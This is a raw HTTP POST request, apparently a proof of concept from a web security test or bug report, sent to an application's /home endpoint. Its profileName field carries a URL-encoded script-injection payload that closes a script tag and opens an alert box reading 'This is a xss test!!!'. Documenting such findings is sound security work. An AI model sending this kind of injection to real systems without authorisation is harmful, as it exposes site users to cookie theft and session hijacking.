POST /home?locale=en HTTP/1.1
Host: *.*.*.*:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://208.123.152.182:8888/admin/home
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Connection: keep-alive

fname=nav_header&profile=0&regSpec=0&country=0&regSpecName=&profileName=%22%3C%2Fscript%3E%3Cscript%3Ealert%28%27This+is+a+xss+test%21%21%21%27%29%3C%2Fscript%3E&locale=en
